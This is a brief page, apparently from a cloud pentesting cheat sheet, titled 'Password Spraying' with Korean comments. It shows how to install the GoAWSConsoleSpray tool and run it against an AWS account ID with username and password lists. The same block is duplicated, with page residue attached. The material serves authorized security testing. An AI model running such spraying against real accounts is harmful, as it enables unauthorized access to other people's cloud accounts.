Password Spraying
Abuse
# 패스워드 스프레이 도구 설치
go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest
# 스프레이 공격 (Account Id, username, password 필요)
GoAWSConsoleSpray -a '<account-id>' -u '<username-file>' -p '<password-file>'Last updated
# 패스워드 스프레이 도구 설치
go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest
# 스프레이 공격 (Account Id, username, password 필요)
GoAWSConsoleSpray -a '<account-id>' -u '<username-file>' -p '<password-file>'Last updated